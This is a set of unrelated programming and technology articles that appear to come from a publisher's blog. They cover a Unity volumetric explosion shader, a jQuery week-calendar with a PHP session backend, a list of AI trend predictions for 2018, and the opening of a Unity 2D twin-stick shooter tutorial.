The vertex function is a variant of the technique called normal extrusion. The difference here is that the amount of extrusion is determined by both the time and the noise texture. When you need a random number in Unity, you can rely on the Random.Range() function. There is no standard way to get random numbers within a shader, so the easiest way is to sample a noise texture.
There is no standard way to animate the explosion over time either, so take the following only as an example:

float time = sin(_Time[3] *_Period + disp.r*10);

The built-in _Time[3] variable is used to get the current time from within the shader, and the red channel of the noise texture (disp.r) is used to make sure that each vertex moves independently. The sin() function makes the vertices go up and down, simulating the chaotic behavior of an explosion. Then, the normal extrusion takes place as shown in the following:

v.vertex.xyz += v.normal * disp.r * _Amount * time;

You should play with these numbers and variables until you find a pattern of movement that you are happy with.

The last part of the effect is achieved by the surface function. Here, the noise texture is used to sample a random color from the ramp texture. However, there are two more aspects worth noticing. The first one is the introduction of _RampOffset. It forces the explosion to sample colors from the left or right side of the ramp texture. With positive values, the surface of the explosion tends to show more grey tones, which is exactly what happens when it is dissolving. You can use _RampOffset to determine how much fire or smoke there should be in your explosion.

The second aspect introduced in the surface function is the use of clip(). The clip() function clips (removes) pixels from the rendering pipeline. When invoked with a negative value, the current pixel is not drawn. This effect is controlled by _ClipRange, which determines which pixels of the volumetric explosion are going to be transparent. By controlling both _RampOffset and _ClipRange, you have full control over how the explosion behaves and dissolves.

There's more…

The shader presented in this recipe makes a sphere look like an explosion. If you really want to use it, you should couple it with some scripts in order to get the most out of it. The best thing to do is to create an explosion object and turn it into a prefab so that you can reuse it every time you need it. You can do this by dragging the sphere back into the Project window. Once that is done, you can create as many explosions as you want using the Instantiate() function.

However, it is worth noticing that all the objects with the same material share the same look. If you have multiple explosions at the same time, they should not use the same material. When you are instantiating a new explosion, you should also duplicate its material. You can do this easily with the following piece of code:

GameObject explosion = Instantiate(explosionPrefab) as GameObject;
Renderer renderer = explosion.GetComponent<Renderer>();
Material material = new Material(renderer.sharedMaterial);
renderer.material = material;

Lastly, if you are going to use this shader in a realistic way, you should attach a script to it that changes its size, _RampOffset, or _ClipRange according to the type of explosion you want to recreate.
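The following C# sketch shows one way such a controller could look; it is not the author's implementation. It assumes the property names from the recipe (_RampOffset and _ClipRange) and uses arbitrary timings: the explosion grows, shifts toward the smoky end of the ramp, and dissolves before destroying itself.

using UnityEngine;

// A sketch of the kind of controller suggested above (not the author's code):
// over its lifetime the explosion grows, its colours shift toward the smoky
// end of the ramp via _RampOffset, and it dissolves by lowering _ClipRange.
// The property names come from the recipe; curves and timings are arbitrary.
public class ExplosionController : MonoBehaviour
{
    public float lifetime = 2.0f;
    public float maxScale = 3.0f;

    private Material material;
    private float age = 0.0f;

    void Start()
    {
        Renderer rend = GetComponent<Renderer>();
        // Duplicate the material so simultaneous explosions do not share state.
        material = new Material(rend.sharedMaterial);
        rend.material = material;
    }

    void Update()
    {
        age += Time.deltaTime;
        float t = Mathf.Clamp01(age / lifetime);

        transform.localScale = Vector3.one * Mathf.Lerp(1.0f, maxScale, t);
        material.SetFloat("_RampOffset", Mathf.Lerp(-0.2f, 0.5f, t));
        material.SetFloat("_ClipRange", Mathf.Lerp(1.0f, 0.0f, t));

        if (age >= lifetime)
        {
            Destroy(gameObject);
        }
    }
}

Because the script duplicates the material in Start(), several explosions can run at the same time without sharing their animation state.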
See also

A lot more can be done to make explosions realistic. The approach presented in this recipe only creates an empty shell; the inside of the explosion is actually empty. An easy trick to improve it is to create particles inside it. However, you can only go so far with this. The short movie The Butterfly Effect (http://unity3d.com/pages/butterfly), created by Unity Technologies in collaboration with Passion Pictures and Nvidia, is the perfect example. It is based on the same concept of altering the geometry of a sphere; however, it renders it with a technique called volume ray casting. In a nutshell, it renders the geometry as if it were a full volume. You can see the following image as an example:

If you are looking for high-quality explosions, refer to Pyro Technix (https://www.assetstore.unity3d.com/en/#!/content/16925) on the Asset Store. It includes volumetric explosions and couples them with realistic shockwaves.

Summary

In this article, we saw recipes to extrude models, implement a snow shader, and create a volumetric explosion.

Resources for Article:

Further resources on this subject:
Lights and Effects [article]
Looking Back, Looking Forward [article]
Animation features in Unity 5 [article]

Calendars in jQuery 1.3 with PHP using jQuery Week Calendar Plugin: Part 1

Packt
19 Nov 2009
7 min read
There are many reasons why you would want to display a calendar. You can use it to display upcoming events, to keep a diary, or to show a timetable. Recently, for example, I combined a calendar with an online store for a client to book meetings and receive payments more intuitively. Google calendar is probably what springs to mind when people think of calendars online. There is a very good plugin called jquery-week-calendar that shows a week with events in a fashion similar to Google's calendar. Its homepage is at http://www.redredred.com.au/projects/jquery-week-calendar/. To get the latest copy of the plugin, go to http://code.google.com/p/jquery-week-calendar/downloads/list and get the highest-numbered file. The examples in this article are done with version 1.2.0. Download the library and extract it so that there is a directory named jquery-weekcalendar-1.2.0 in the root of your demo directory. Displaying the calendar As usual, the HTML for the simplest configuration is very simple. Save this as calendar.html: <html> <head> <script src="../jquery.min.js"></script> <script src="../jquery-ui.min.js"></script> <script src="../jquery-weekcalendar-1.2.0/jquery.weekcalendar.js"> </script> <script src="calendar.js"></script> <link rel="stylesheet" type="text/css" href="../jquery-ui.css" /> <link rel="stylesheet" type="text/css" href="../jquery-weekcalendar-1.2.0/jquery.weekcalendar.css"/> </head> <body> <div id="calendar_wrapper" style="height:500px"></div> </body> </html> We will keep all of our JavaScript in an external file called calendar.js, which will initially contain just this: $(document).ready(function() { $('#calendar_wrapper').weekCalendar({ 'height':function($calendar){ return $('#calendar_wrapper')[0].offsetHeight; } }); }); This is fairly straightforward. The script will apply the widget to the #calendar_wrapper element, and the widget's height will be set to that of the wrapper element. Even with this tiny bit of code, we already have a good-looking calendar, and when you drag your mouse cursor around it, you'll see that events are created as you lift the mouse up: It looks good, but it doesn't do anything yet. The events are temporary, and will vanish as soon as you change the week or reload the page. In order to make them permanent, we need to send details of the events to the server and save them there. Creating an event What we need to do is to have the client save the event on the server when it is created. In this article, we'll use PHP sessions to save the data for the sake of simplicity. Sessions are chunks of data, which are kept on the server side and are related to the cookie or PHPSESSID parameter that the client uses to access that session. We will use sessions in these examples because they do not need as much setup as databases. For your own projects, you should adapt the PHP side in order to connect to a database instead. If you are using this article to create a full application, you will obviously want to use something more permanent than sessions, in which case the PHP code should be adapted such that all references to sessions are replaced with database references instead. This is beyond the scope of this book, but as you are a PHP developer, you probably do this everyday anyway! When the event has been created, we want a modal dialog to appear and ask for more details. In this test case, we'll add a text area for further details, which allows for more data than would appear in the small visible area in the calendar itself. 
A modal dialog is a "pop up" that appears and blocks all other actions on the page until it has been taken care of. It's useful in cases where the answer to a question must be known before a script can carry on with its work. Now, let's create an event and add it to our calendar. Client-side code In the calendar.js file, add an eventNew event to the weekCalendar call: $(document).ready(function() { $('#calendar_wrapper').weekCalendar({ 'height':function($calendar){ return $('#calendar_wrapper')[0].offsetHeight; }, 'eventNew':function(calEvent, $event) { calendar_new_entry(calEvent,$event); } }); }); When an event is created, the calendar_new_entry function will be called with details of the new event in the calEvent parameter. Now, add the function calendar_new_entry: function calendar_new_entry(calEvent,$event){ var ds=calEvent.start, df=calEvent.end; $('<div id="calendar_new_entry_form" title="New Calendar Entry"> event name<br /> <input value="new event" id="calendar_new_entry_form_title" /> <br /> body text<br /> <textarea style="width:400px;height:200px" id="calendar_new_entry_form_body">event description </textarea> </div>').appendTo($('body')); $("#calendar_new_entry_form").dialog({ bgiframe: true, autoOpen: false, height: 440, width: 450, modal: true, buttons: { 'Save': function() { var $this=$(this); $.getJSON('./calendar.php?action=save&id=0&start=' +ds.getTime()/1000+'&end='+df.getTime()/1000, { 'body':$('#calendar_new_entry_form_body').val(), 'title':$('#calendar_new_entry_form_title').val() }, function(ret){ $this.dialog('close'); $('#calendar_wrapper').weekCalendar('refresh'); $("#calendar_new_entry_form").remove(); } ); }, Cancel: function() { $event.remove(); $(this).dialog('close'); $("#calendar_new_entry_form").remove(); } }, close: function() { $('#calendar').weekCalendar('removeUnsavedEvents'); $("#calendar_new_entry_form").remove(); } }); $("#calendar_new_entry_form").dialog('open'); } What's happening here is that a form is created and added to the body (the second line of the function), then the third line of the function creates a modal window from that form and adds some buttons to it. Our modal dialog should look like this: The Save button, when pressed, calls the server-side file calendar.php with the parameters needed to save the event, including the start and end, and the title and body. When the result returns, the calendar is refreshed with the new event's data included. When any of the buttons are clicked, we close the dialog and remove it from the page completely. Note how we are sending time information to the server (shown highlighted in the code we just saw). JavaScript time functions usually measure in milliseconds, but we want to send it to PHP, which generally measures time in seconds. So, we convert the value on the client so that the PHP can use the received data as it is, without needing to do anything to it. Every little helps! Server-side code On the server side, we want to take the new event and save it. Remember that we're doing it in sessions in this example, but you should feel free to adapt this to any other model that you wish. 
Create a file called calendar.php and save it with this source in it: <?php session_start(); if(!isset($_SESSION['calendar'])){ $_SESSION['calendar']=array( 'ids'=>0, ); } if(isset($_REQUEST['action'])){ switch($_REQUEST['action']){ case 'save': // { $start_date=(int)$_REQUEST['start']; $data=array( 'title'=>(isset($_REQUEST['title'])?$_REQUEST['title']:''), 'body' =>(isset($_REQUEST['body'])?$_REQUEST['body']:''), 'start'=>date('c',$start_date), 'end' =>date('c',(int)$_REQUEST['end']) ); $id=(int)$_REQUEST['id']; if($id && isset($_SESSION['calendar'][$id])){ $_SESSION['calendar'][$id]=$data; } else{ $id= ++$_SESSION['calendar']['ids']; $_SESSION['calendar'][$id]=$data; } echo 1; exit; // } } } ?> In the server-side code of this project, all the requested actions are handled by a switch statement. This is done for demonstration purposes—whenever we add a new action, we simply add a new switch case. If you are using this for your own purposes, you may wish to rewrite it using functions instead of large switch cases. The date function is used to convert the start and end parameters into ISO 8601 date format. That's the format jquery-week-calendar prefers, so we'll try to keep everything in that format. Visually, nothing appears to happen, but the data is actually being saved. To see what's being saved, create a new file named test.php, and use the var_dump function in it to examine the session data (view it in your browser): <?php session_start(); var_dump($_SESSION); ?> Here's an example from my test machine:

18 striking AI Trends to watch in 2018 - Part 1

Sugandha Lahoti
27 Dec 2017
14 min read
Artificial Intelligence is the talk of the town. It has evolved past merely being a buzzword in 2016, to be used in a more practical manner in 2017. As 2018 rolls out, we will gradually notice AI transitioning into a necessity. We have prepared a detailed report, on what we can expect from AI in the upcoming year. So sit back, relax, and enjoy the ride through the future. (Don’t forget to wear your VR headgear! ) Here are 18 things that will happen in 2018 that are either AI driven or driving AI: Artificial General Intelligence may gain major traction in research. We will turn to AI enabled solution to solve mission-critical problems. Machine Learning adoption in business will see rapid growth. Safety, ethics, and transparency will become an integral part of AI application design conversations. Mainstream adoption of AI on mobile devices Major research on data efficient learning methods AI personal assistants will continue to get smarter Race to conquer the AI optimized hardware market will heat up further We will see closer AI integration into our everyday lives. The cryptocurrency hype will normalize and pave way for AI-powered Blockchain applications. Advancements in AI and Quantum Computing will share a symbiotic relationship Deep learning will continue to play a significant role in AI development progress. AI will be on both sides of the cybersecurity challenge. Augmented reality content will be brought to smartphones. Reinforcement learning will be applied to a large number of real-world situations. Robotics development will be powered by Deep Reinforcement learning and Meta-learning Rise in immersive media experiences enabled by AI. A large number of organizations will use Digital Twin. 1. General AI: AGI may start gaining traction in research. AlphaZero is only the beginning. 2017 saw Google’s AlphaGo Zero (and later AlphaZero) beat human players at Go, Chess, and other games. In addition to this, computers are now able to recognize images, understand speech, drive cars, and diagnose diseases better with time. AGI is an advancement of AI which deals with bringing machine intelligence as close to humans as possible. So, machines can possibly do any intellectual task that a human can! The success of AlphaGo covered one of the crucial aspects of AGI systems—the ability to learn continually, avoiding catastrophic forgetting. However, there is a lot more to achieving human-level general intelligence than the ability to learn continually. For instance, AI systems of today can draw on skills it learned on one game to play another. But they lack the ability to generalize the learned skill. Unlike humans, these systems do not seek solutions from previous experiences. An AI system cannot ponder and reflect on a new task, analyze its capabilities, and work out how best to apply them. In 2018, we expect to see advanced research in the areas of deep reinforcement learning, meta-learning, transfer learning, evolutionary algorithms and other areas that aid in developing AGI systems. Detailed aspects of these ideas are highlighted in later points. We can indeed say, Artificial General Intelligence is inching closer than ever before and 2018 is expected to cover major ground in that direction. 2. Enterprise AI: Machine Learning adoption in enterprises will see rapid growth. 
2017 saw a rise in cloud offerings by major tech players, such as the Amazon Sagemaker, Microsoft Azure Cloud, Google Cloud Platform, allowing business professionals and innovators to transfer labor-intensive research and analysis to the cloud. Cloud is a $130 billion industry as of now, and it is projected to grow.  Statista carried out a survey to present the level of AI adoption among businesses worldwide, as of 2017.  Almost 80% of the participants had incorporated some or other form of AI into their organizations or planned to do so in the future. Source: https://www.statista.com/statistics/747790/worldwide-level-of-ai-adoption-business/ According to a report from Deloitte, medium and large enterprises are set to double their usage of machine learning by the end of 2018. Apart from these, 2018 will see better data visualization techniques, powered by machine learning, which is a critical aspect of every business.  Artificial intelligence is going to automate the cycle of report generation and KPI analysis, and also, bring in deeper analysis of consumer behavior. Also with abundant Big data sources coming into the picture, BI tools powered by AI will emerge, which can harness the raw computing power of voluminous big data for data models to become streamlined and efficient. 3. Transformative AI: We will turn to AI enabled solutions to solve mission-critical problems. 2018 will see the involvement of AI in more and more mission-critical problems that can have world-changing consequences: read enabling genetic engineering, solving the energy crisis, space exploration, slowing climate change, smart cities, reducing starvation through precision farming, elder care etc. Recently NASA revealed the discovery of a new exoplanet, using data crunched from Machine learning and AI. With this recent reveal, more AI techniques would be used for space exploration and to find other exoplanets. We will also see the real-world deployment of AI applications. So it will not be only about academic research, but also about industry readiness. 2018 could very well be the year when AI becomes real for medicine. According to Mark Michalski, executive director, Massachusetts General Hospital and Brigham and Women’s Center for Clinical Data Science, “By the end of next year, a large number of leading healthcare systems are predicted to have adopted some form of AI within their diagnostic groups.”  We would also see the rise of robot assistants, such as virtual nurses, diagnostic apps in smartphones, and real clinical robots that can monitor patients, take care of the elderly, alert doctors, and send notifications in case of emergency. More research will be done on how AI enabled technology can help in difficult to diagnose areas in health care like mental health, the onset of hereditary diseases among others. Facebook's attempt at detection of potential suicidal messages using AI is a sign of things to come in this direction. As we explore AI enabled solutions to solve problems that have a serious impact on individuals and societies at large, considering the ethical and moral implications of such solutions will become central to developing them, let alone hard to ignore. 4. Safe AI: Safety, Ethics, and Transparency in AI applications will become integral to conversations on AI adoption and app design. The rise of machine learning capabilities has also given rise to forms of bias, stereotyping and unfair determination in such systems. 
2017 saw some high profile news stories about gender bias, object recognition datasets like MS COCO, to racial disparities in education AI systems. At NIPS 2017, Kate Crawford talked about bias in machine learning systems which resonated greatly with the community and became pivotal to starting conversations and thinking by other influencers on how to address the problems raised.  DeepMind also launched a new unit, the DeepMind Ethics & Society,  to help technologists put ethics into practice, and to help society anticipate and direct the impact of AI for the benefit of all. Independent bodies like IEEE also pushed for standards in it’s ethically aligned design paper. As news about the bro culture in Silicon Valley and the lack of diversity in the tech sector continued to stay in the news all of 2017, it hit closer home as the year came to an end, when Kristian Lum, Lead Statistician at HRDAG, described her experiences with harassment as a graduate student at prominent stat conferences. This has had a butterfly effect of sorts with many more women coming forward to raise the issue in the ML/AI community. They talked about the formation of a stronger code of conduct by boards of key conferences such as NIPS among others. Eric Horvitz, a Microsoft research director, called Lum’s post a "powerful and important report." Jeff Dean, head of Google’s Brain AI unit applauded Lum for having the courage to speak about this behavior. Other key influencers from the ML and statisticians community also spoke in support of Lum and added their views on how to tackle the problem. While the road to recovery is long and machines with moral intelligence may be decades away, 2018 is expected to start that journey in the right direction by including safety, ethics, and transparency in AI/ML systems. Instead of just thinking about ML contributing to decision making in say hiring or criminal justice, data scientists would begin to think of the potential role of ML in the harmful representation of human identity. These policies will not only be included in the development of larger AI ecosystems but also in national and international debates in politics, businesses, and education. 5. Ubiquitous AI: AI will start redefining life as we know it, and we may not even know it happened. Artificial Intelligence will gradually integrate into our everyday lives. We will see it in our everyday decisions like what kind of food we eat, the entertainment we consume, the clothes we wear, etc.  Artificially intelligent systems will get better at complex tasks that humans still take for granted, like walking around a room and over objects. We’re going to see more and more products that contain some form of AI enter our lives. AI enabled stuff will become more common and available. We will also start seeing it in the background for life-altering decisions we make such as what to learn, where to work, whom to love, who our friends are,  whom should we vote for, where should we invest, and where should we live among other things. 6. Embedded AI: Mobile AI means a radically different way of interacting with the world. There is no denying that AI is the power source behind the next generation of smartphones. A large number of organizations are enabling the use of AI in smartphones, whether in the form of deep learning chips, or inbuilt software with AI capabilities. The mobile AI will be a  combination of on-device AI and cloud AI. 
Intelligent phones will have end-to-end capabilities that support coordinated development of chips, devices, and the cloud. The release of iPhone X’s FaceID—which uses a neural network chip to construct a mathematical model of the user’s face— and self-driving cars are only the beginning. As 2018 rolls out we will see vast applications on smartphones and other mobile devices which will run deep neural networks to enable AI. AI going mobile is not just limited to the embedding of neural chips in smartphones. The next generation of mobile networks 5G will soon greet the world. 2018 is going to be a year of closer collaborations and increasing partnerships between telecom service providers, handset makers, chip markers and AI tech enablers/researchers. The Baidu-Huawei partnership—to build an open AI mobile ecosystem, consisting of devices, technology, internet services, and content—is an example of many steps in this direction. We will also see edge computing rapidly becoming a key part of the Industrial Internet of Things (IIoT) to accelerate digital transformation. In combination with cloud computing, other forms of network architectures such as fog and mist would also gain major traction. All of the above will lead to a large-scale implementation of cognitive IoT, which combines traditional IoT implementations with cognitive computing. It will make sensors capable of diagnosing and adapting to their environment without the need for human intervention. Also bringing in the ability to combine multiple data streams that can identify patterns. This means we will be a lot closer to seeing smart cities in action. 7. Data-sparse AI: Research into data efficient learning methods will intensify 2017 saw highly scalable solutions for problems in object detection and recognition, machine translation, text-to-speech, recommender systems, and information retrieval.  The second conference on Machine Translation happened in September 2017.  The 11th ACM Conference on Recommender Systems in August 2017 witnessed a series of papers presentations, featured keynotes, invited talks, tutorials, and workshops in the field of recommendation system. Google launched the Tacotron 2 for generating human-like speech from text. However, most of these researches and systems attain state-of-the-art performance only when trained with large amounts of data. With GDPR and other data regulatory frameworks coming into play, 2018 is expected to witness machine learning systems which can learn efficiently maintaining performance, but in less time and with less data. A data-efficient learning system allows learning in complex domains without requiring large quantities of data. For this, there would be developments in the field of semi-supervised learning techniques, where we can use generative models to better guide the training of discriminative models. More research would happen in the area of transfer learning (reuse generalize knowledge across domains), active learning, one-shot learning, Bayesian optimization as well as other non-parametric methods.  In addition, researchers and organizations will exploit bootstrapping and data augmentation techniques for efficient reuse of available data. Other key trends propelling data efficient learning research are growing in-device/edge computing, advancements in robotics, AGI research, and energy optimization of data centers, among others. 8. Conversational AI: AI personal assistants will continue to get smarter AI-powered virtual assistants are expected to skyrocket in 2018. 
2017 was filled to the brim with new releases. Amazon brought out the Echo Look and the Echo Show. Google made its personal assistant more personal by allowing linking of six accounts to the Google Assistant built into the Home via the Home app. Bank of America unveiled Erica, it’s AI-enabled digital assistant. As 2018 rolls out, AI personal assistants will find its way into an increasing number of homes and consumer gadgets. These include increased availability of AI assistants in our smartphones and smart speakers with built-in support for platforms such as Amazon’s Alexa and Google Assistant. With the beginning of the new year, we can see personal assistants integrating into our daily routines. Developers will build voice support into a host of appliances and gadgets by using various voice assistant platforms. More importantly, developers in 2018 will try their hands on conversational technology which will include emotional sensitivity (affective computing) as well as machine translational technology (the ability to communicate seamlessly between languages). Personal assistants would be able to recognize speech patterns, for instance, of those indicative of wanting help. AI bots may also be utilized for psychiatric counseling or providing support for isolated people.  And it’s all set to begin with the AI assistant summit in San Francisco scheduled on 25 - 26 January 2018. It will witness talks by world's leading innovators in advances in AI Assistants and artificial intelligence. 9. AI Hardware: Race to conquer the AI optimized hardware market will heat up further Top tech companies (read Google, IBM, Intel, Nvidia) are investing heavily in the development of AI/ML optimized hardware. Research and Markets have predicted the global AI chip market will have a growth rate of about 54% between 2017 and 2021. 2018 will see further hardware designs intended to greatly accelerate the next generation of applications and run AI computational jobs. With the beginning of 2018 chip makers will battle it out to determine who creates the hardware that artificial intelligence lives on. Not only that, there would be a rise in the development of new AI products, both for hardware and software platforms that run deep learning programs and algorithms. Also, chips which move away from the traditional one-size-fits-all approach to application-based AI hardware will grow in popularity. 2018 would see hardware which does not only store data, but also transform it into usable information. The trend for AI will head in the direction of task-optimized hardware. 2018 may also see hardware organizations move to software domains and vice-versa. Nvidia, most famous for their Volta GPUs have come up with NVIDIA DGX-1, a software for AI research, designed to streamline the deep learning workflow. More such transitions are expected at the highly anticipated CES 2018. [dropcap]P[/dropcap]hew, that was a lot of writing! But I hope you found it just as interesting to read as I found writing it. However, we are not done yet. And here is part 2 of our 18 AI trends in ‘18. 

2D Twin-stick Shooter

Packt
11 Nov 2014
21 min read
This article written by John P. Doran, the author of Unity Game Development Blueprints, teaches us how to use Unity to prepare a well formed game. It also gives people experienced in this field a chance to prepare some great stuff. (For more resources related to this topic, see here.) The shoot 'em up genre of games is one of the earliest kinds of games. In shoot 'em ups, the player character is a single entity fighting a large number of enemies. They are typically played with a top-down perspective, which is perfect for 2D games. Shoot 'em up games also exist with many categories, based upon their design elements. Elements of a shoot 'em up were first seen in the 1961 Spacewar! game. However, the concept wasn't popularized until 1978 with Space Invaders. The genre was quite popular throughout the 1980s and 1990s and went in many different directions, including bullet hell games, such as the titles of the Touhou Project. The genre has recently gone through a resurgence in recent years with games such as Bizarre Creations' Geometry Wars: Retro Evolved, which is more famously known as a twin-stick shooter. Project overview Over the course of this article, we will be creating a 2D multidirectional shooter game similar to Geometry Wars. In this game, the player controls a ship. This ship can move around the screen using the keyboard and shoot projectiles in the direction that the mouse is points at. Enemies and obstacles will spawn towards the player, and the player will avoid/shoot them. This article will also serve as a refresher on a lot of the concepts of working in Unity and give an overview of the recent addition of native 2D tools into Unity. Your objectives This project will be split into a number of tasks. It will be a simple step-by-step process from beginning to end. Here is the outline of our tasks: Setting up the project Creating our scene Adding in player movement Adding in shooting functionality Creating enemies Adding GameController to spawn enemy waves Particle systems Adding in audio Adding in points, score, and wave numbers Publishing the game Prerequisites Before we start, we will need to get the latest Unity version, which you can always get by going to http://unity3d.com/unity/download/ and downloading it there: At the time of writing this article, the version is 4.5.3, but this project should work in future versions with minimal changes. Navigate to the preceding URL, and download the Chapter1.zip package and unzip it. Inside the Chapter1 folder, there are a number of things, including an Assets folder, which will have the art, sound, and font files you'll need for the project as well as the Chapter_1_Completed.unitypackage (this is the complete article package that includes the entire project for you to work with). I've also added in the complete game exported (TwinstickShooter Exported) as well as the entire project zipped up in the TwinstickShooter Project.zip file. Setting up the project At this point, I have assumed that you have Unity freshly installed and have started it up. With Unity started, go to File | New Project. Select Project Location of your choice somewhere on your hard drive, and ensure you have Setup defaults for set to 2D. Once completed, select Create. At this point, we will not need to import any packages, as we'll be making everything from scratch. It should look like the following screenshot: From there, if you see the Welcome to Unity pop up, feel free to close it out as we won't be using it. 
At this point, you will be brought to the general Unity layout, as follows: Again, I'm assuming you have some familiarity with Unity before reading this article; if you would like more information on the interface, please visit http://docs.unity3d.com/Documentation/Manual/LearningtheInterface.html. Keeping your Unity project organized is incredibly important. As your project moves from a small prototype to a full game, more and more files will be introduced to your project. If you don't start organizing from the beginning, you'll keep planning to tidy it up later on, but as deadlines keep coming, things may get quite out of hand. This organization becomes even more vital when you're working as part of a team, especially if your team is telecommuting. Differing project structures across different coders/artists/designers is an awful mess to find yourself in. Setting up a project structure at the start and sticking to it will save you countless minutes of time in the long run and only takes a few seconds, which is what we'll be doing now. Perform the following steps: Click on the Create drop-down menu below the Project tab in the bottom-left side of the screen. From there, click on Folder, and you'll notice that a new folder has been created inside your Assets folder. After the folder is created, you can type in the name for your folder. Once done, press Enter for the folder to be created. We need to create folders for the following directories:      Animations      Prefabs      Scenes      Scripts      Sprites If you happen to create a folder inside another folder, you can simply drag-and-drop it from the left-hand side toolbar. If you need to rename a folder, simply click on it once and wait, and you'll be able to edit it again. You can also use Ctrl + D to duplicate a folder if it is selected. Once you're done with the aforementioned steps, your project should look something like this: Creating our scene Now that we have our project set up, let's get started with creating our player: Double-click on the Sprites folder. Once inside, go to your operating system's browser window, open up the Chapter 1/Assets folder that we provided, and drag the playerShip.png file into the folder to move it into our project. Once added, confirm that the image is Sprite by clicking on it and confirming from the Inspector tab that Texture Type is Sprite. If it isn't, simply change it to that, and then click on the Apply button. Have a look at the following screenshot: If you do not want to drag-and-drop the files, you can also right-click within the folder in the Project Browser (bottom-left corner) and select Import New Asset to select a file from a folder to bring it in. The art assets used for this tutorial were provided by Kenney. To see more of their work, please check out www.kenney.nl. Next, drag-and-drop the ship into the scene (the center part that's currently dark gray). Once completed, set the position of the sprite to the center of the Screen (0, 0) by right-clicking on the Transform component and then selecting Reset Position. Have a look at the following screenshot: Now, with the player in the world, let's add in a background. Drag-and-drop the background.png file into your Sprites folder. After that, drag-and-drop a copy into the scene. 
If you put the background on top of the ship, you'll notice that currently the background is in front of the player (Unity puts newly added objects on top of previously created ones if their position on the Z axis is the same; this is commonly referred to as the z-order), so let's fix that. Objects on the same Z axis without sorting layer are considered to be equal in terms of draw order; so just because a scene looks a certain way this time, when you reload the level it may look different. In order to guarantee that an object is in front of another one in 2D space is by having different Z values or using sorting layers. Select your background object, and go to the Sprite Renderer component from the Inspector tab. Under Sorting Layer, select Add Sorting Layer. After that, click on the + icon for Sorting Layers, and then give Layer 1 a name, Background. Now, create a sorting layer for Foreground and GUI. Have a look at the following screenshot: Now, place the player ship on the foreground and the background by selecting the object once again and then setting the Sorting Layer property via the drop-down menu. Now, if you play the game, you'll see that the ship is in front of the background, as follows: At this point, we can just duplicate our background a number of times to create our full background by selecting the object in the Hierarchy, but that is tedious and time-consuming. Instead, we can create all of the duplicates by either using code or creating a tileable texture. For our purposes, we'll just create a texture. Delete the background sprite by left-clicking on the background object in the Hierarchy tab on the left-hand side and then pressing the Delete key. Then select the background sprite in the Project tab, change Texture Type in the Inspector tab to Texture, and click on Apply. Now let's create a 3D cube by selecting Game Object | Create Other | Cube from the top toolbar. Change the object's name from Cube to Background. In the Transform component, change the Position to (0, 0, 1) and the Scale to (100, 100, 1). If you are using Unity 4.6 you will need to go to Game Object | 3D Object | Cube to create the cube. Since our camera is at 0, 0, -10 and the player is at 0, 0, 0, putting the object at position 0, 0, 1 will put it behind all of our sprites. By creating a 3D object and scaling it, we are making it really large, much larger than the player's monitor. If we scaled a sprite, it would be one really large image with pixelation, which would look really bad. By using a 3D object, the texture that is applied to the faces of the 3D object is repeated, and since the image is tileable, it looks like one big continuous image. Remove Box Collider by right-clicking on it and selecting Remove Component. Next, we will need to create a material for our background to use. To do so, under the Project tab, select Create | Material, and name the material as BackgroundMaterial. Under the Shader property, click on the drop-down menu, and select Unlit | Texture. Click on the Texture box on the right-hand side, and select the background texture. Once completed, set the Tiling property's x and y to 25. Have a look at the following screenshot: In addition to just selecting from the menu, you can also drag-and-drop the background texture directly onto the Texture box, and it will set the property. Tiling tells Unity how many times the image should repeat in the x and y positions, respectively. Finally, go back to the Background object in Hierarchy. 
Under the Mesh Renderer component, open up Materials by left-clicking on the arrow, and change Element 0 to our BackgroundMaterial material. Consider the following screenshot: Now, when we play the game, you'll see that we now have a complete background that tiles properly. Scripting 101 In Unity, the behavior of game objects is controlled by the different components that are attached to them in a form of association called composition. These components are things that we can add and remove at any time to create much more complex objects. If you want to do anything that isn't already provided by Unity, you'll have to write it on your own through a process we call scripting. Scripting is an essential element in all but the simplest of video games. Unity allows you to code in either C#, Boo, or UnityScript, a language designed specifically for use with Unity and modelled after JavaScript. For this article, we will use C#. C# is an object-oriented programming language—an industry-standard language similar to Java or C++. The majority of plugins from Asset Store are written in C#, and code written in C# can port to other platforms, such as mobile, with very minimal code changes. C# is also a strongly-typed language, which means that if there is any issue with the code, it will be identified within Unity and will stop you from running the game until it's fixed. This may seem like a hindrance, but when working with code, I very much prefer to write correct code and solve problems before they escalate to something much worse. Implementing player movement Now, at this point, we have a great-looking game, but nothing at all happens. Let's change that now using our player. Perform the following steps: Right-click on the Scripts folder you created earlier, click on Create, and select the C# Script label. Once you click on it, a script will appear in the Scripts folder, and it should already have focus and should be asking you to type a name for the script—call it PlayerBehaviour. Double-click on the script in Unity, and it will open MonoDevelop, which is an open source integrated development environment (IDE) that is included with your Unity installation. After MonoDevelop has loaded, you will be presented with the C# stub code that was created automatically for you by Unity when you created the C# script. Let's break down what's currently there before we replace some of it with new code. At the top, you will see two lines: using UnityEngine;using System.Collections; The engine knows that if we refer to a class that isn't located inside this file, then it has to reference the files within these namespaces for the referenced class before giving an error. We are currently using two namespaces. The UnityEngine namespace contains interfaces and class definitions that let MonoDevelop know about all the addressable objects inside Unity. The System.Collections namespace contains interfaces and classes that define various collections of objects, such as lists, queues, bit arrays, hash tables, and dictionaries. We will be using a list, so we will change the line to the following: using System.Collections.Generic; The next line you'll see is: public class PlayerBehaviour : MonoBehaviour { You can think of a class as a kind of blueprint for creating a new component type that can be attached to GameObjects, the objects inside our scenes that start out with just a Transform and then have components added to them. 
When Unity created our C# stub code, it took care of this for us; we can see the result, as our file is called PlayerBehaviour and the class is also called PlayerBehaviour. Make sure that your .cs file and the name of the class match, as they must be the same to enable the script component to be attached to a game object.

Next up is the : MonoBehaviour part of the line. The : symbol signifies that we inherit from a particular class; in this case, MonoBehaviour. All behavior scripts must inherit from MonoBehaviour, either directly or indirectly by being derived from a class that does. Inheritance is the idea of basing one class on another so that it reuses the same implementation. With this in mind, all the functions and variables that exist inside the MonoBehaviour class will also exist in the PlayerBehaviour class, because PlayerBehaviour is a MonoBehaviour. For more information on the MonoBehaviour class and all the functions and properties it has, check out http://docs.unity3d.com/ScriptReference/MonoBehaviour.html.

Directly after this line, we will want to add some variables to help us with the project. Variables are pieces of data that we wish to hold on to for one reason or another, typically because they will change over the course of a program, and we will do different things based on their values. Add the following code under the class definition:

// Movement modifier applied to directional movement.
public float playerSpeed = 2.0f;

// What the current speed of our player is
private float currentSpeed = 0.0f;

/*
 * Allows us to have multiple inputs and supports keyboard,
 * joystick, etc.
 */
public List<KeyCode> upButton;
public List<KeyCode> downButton;
public List<KeyCode> leftButton;
public List<KeyCode> rightButton;

